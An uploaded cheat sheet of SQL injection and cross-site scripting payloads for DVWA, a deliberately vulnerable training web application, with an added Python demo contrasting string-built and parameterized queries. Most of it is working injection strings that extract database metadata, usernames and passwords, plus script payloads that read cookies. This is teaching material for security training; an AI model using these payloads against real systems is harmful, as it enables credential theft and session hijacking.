Dvwa Sqlinjection

This document provides examples of SQL injection and cross-site scripting (XSS) attacks that can be performed on a vulnerable web application called DVWA. It lists SQL queries that can be used to retrieve database information like versions and tables, as well as XSS payloads that trigger alerts and read cookies. The goal is to demonstrate how these attacks work through examples on a training platform called DVWA.

Uploaded by

Hieun kong

DVWA

DVWA - SqlInjection
Always True Scenario:
• %' or '0'='0
– Resulting query: SELECT first_name, last_name FROM users WHERE user_id = '%' or '0'='0';
Display Database Version:
• %' or 0=0 union select null, version() #
Display Database User:
• %' or 0=0 union select null, user() #
Display Database Name:
• %' or 0=0 union select null, database() #
Display all tables in information_schema:
• %' and 1=0 union select null, table_name from information_schema.tables #
Display all tables in information_schema whose name starts with "user":
• %' and 1=0 union select null, table_name from information_schema.tables where table_name like 'user%' #
Display all column names of the users table (from information_schema.columns):
• %' and 1=0 union select null, concat(table_name,0x0a,column_name) from information_schema.columns where table_name = 'users' #
Display the contents of those columns from the users table:
• %' and 1=0 union select null, concat(first_name,0x0a,last_name,0x0a,user,0x0a,password) from users #
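As an added example (not part of the original slides), the always-true input from the first slide run against a constructed in-memory SQLite stand-in for DVWA's users table: the string-built query returns every row, while the parameterized version treats the same input as a literal user_id and returns nothing. The table rows and the helper names are constructed for this demonstration.

```python
import sqlite3

# Constructed stand-in for DVWA's users table (sample rows, not DVWA's data).
SAMPLE_USERS = [(1, "admin", "admin"), (2, "Gordon", "Brown"), (3, "Hack", "Me")]


def make_db():
    """Create an in-memory SQLite database with a minimal users table."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user_id INTEGER, first_name TEXT, last_name TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)", SAMPLE_USERS)
    return conn


def lookup_vulnerable(conn, user_id):
    """Mirror the slide's query: the input is spliced into the SQL text."""
    sql = f"SELECT first_name, last_name FROM users WHERE user_id = '{user_id}'"
    return conn.execute(sql).fetchall()


def lookup_parameterized(conn, user_id):
    """Fix: bind the value as a parameter so it is data, never SQL syntax."""
    sql = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return conn.execute(sql, (user_id,)).fetchall()


def looks_like_tautology(rows, expected_max=1):
    """Detection heuristic: a single-id lookup should never return more than one row."""
    return len(rows) > expected_max


if __name__ == "__main__":
    conn = make_db()
    payload = "%' or '0'='0"  # the always-true input from the slide
    print("vulnerable:", lookup_vulnerable(conn, payload))        # every row
    print("parameterized:", lookup_parameterized(conn, payload))  # no rows
```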
DVWA - XSS
XSS Stored Menu:
• <script>alert("This is a XSS Exploit Test")</script>
• <iframe src="http://www.cnn.com"></iframe>
• <script>alert(document.cookie)</script>
XSS Reflected:
Submit cookie XSS attack - CSRF:
• <script>alert(document.cookie)</script> - use curl to manipulate the URL
